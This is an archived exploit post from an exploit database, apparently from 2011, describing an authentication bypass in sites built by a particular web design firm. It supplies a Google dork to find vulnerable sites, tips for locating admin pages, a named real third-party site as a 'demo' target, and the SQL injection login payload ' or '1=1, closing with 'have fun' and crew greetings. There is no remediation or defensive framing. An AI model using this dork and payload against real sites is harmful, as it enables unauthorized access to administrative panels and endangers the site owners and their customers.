The Formula Group SQL Injection

2011-10-02T00:00:00
ID PACKETSTORM:105496
Type packetstorm
Reporter nGa Sa Lu
Modified 2011-10-02T00:00:00

Description

                                        
                                            `  
============================================   
# Exploit Title : The Formula Group Auth bypass   
# Google Dork : intext:"WEB DESIGN BY THE FORMULA"   
# Date : 2011-2-10   
# Author : nGa Sa Lu [ GaNgst3r ]   
# Service Link : http://www.theformula.co.za/index.php#theform   
# Tested on : Vista   
# Platform : asp   
=============================================  
  
[+] Google Dork :   
intext:"WEB DESIGN BY THE FORMULA"  
  
[+] Admin page :  
./ try searhcing admin page.  
./ e.g  
http://www.localhost.com/admin/   
  
[+] Demo :  
http://www.lingeriesouthafrica.co.za/admin/  
  
[+] bypass code : [ login with ]  
' or '1=1  
' or '1=1  
  
[+] have fun ^_^  
  
########################################################  
x Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros -  
########################################################  
  
x-[+] i'am ################################################  
- [ dongoth ] >> [ GaNgst3r ] >> [ nGa Sa Lu ] >> x  
########################################################  
==================================================  
`